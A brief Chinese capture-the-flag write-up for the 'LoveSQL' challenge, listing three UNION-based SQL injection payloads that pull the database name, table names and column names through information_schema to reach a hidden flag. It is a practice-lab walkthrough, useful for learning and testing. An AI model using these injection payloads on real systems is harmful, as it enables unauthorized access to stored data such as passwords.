BUU10 [极客大挑战 2019]LoveSQL1

万能用户名(密码随便)

登录进去以后发现是这个东西,然而并没有什么卵用

然后就开始爆破数据库名字--表名--列名

注意:这道题需要将所有的表名都爆出来,需要在payload里头写 group_concat(),否则页面只会显示那个没有flag的假表名

1.1' union select 1,2,database() #

(爆出来数据库名字是 geek)

2.1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek' #

(爆出来geek库中的表名是geekuser(假的)和l0ve1ysq1)

3.1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1'#

(爆出来有id(永远都是1)和username和password还有flag)

这个题最大的坑在于flag藏在最终的password中,而必须要用group_concat()去显示完整的行,否则就看不见

相关推荐
SelectDB1 小时前
Apache Doris Python UDF:让 SQL 直接调用 Python 生态,支撑 Agent 时代复杂业务逻辑
大数据·数据库·python
jiayou641 天前
KingbaseES 表级与列级加密完全指南
数据库·后端
GBASE2 天前
G术时刻 |GBase 8s数据库事务并发控制之封锁技术介绍(下)
数据库
xiezhr2 天前
逛GitHub发现了一款免费的带AI功能的数据库管理工具
数据库·ai编程·dba
唐青枫3 天前
MySQL JSON 实战详解:从存储、查询、更新到 JSON_TABLE 与索引
sql·mysql
吃糖的小孩3 天前
给 QQ AI 机器人设计“可控记忆”:会话摘要、手动长期记忆与角色卡边界
数据库
笃行3504 天前
金仓数据库数据安全双防线:静态存储加密与传输加密实战
数据库
笃行3504 天前
金仓数据库物理备份实战:sys_rman 全流程演练与误覆盖抢救
数据库
笃行3504 天前
金仓数据库逻辑备份实战:从全库导出到 Schema 替换的完整闭环
数据库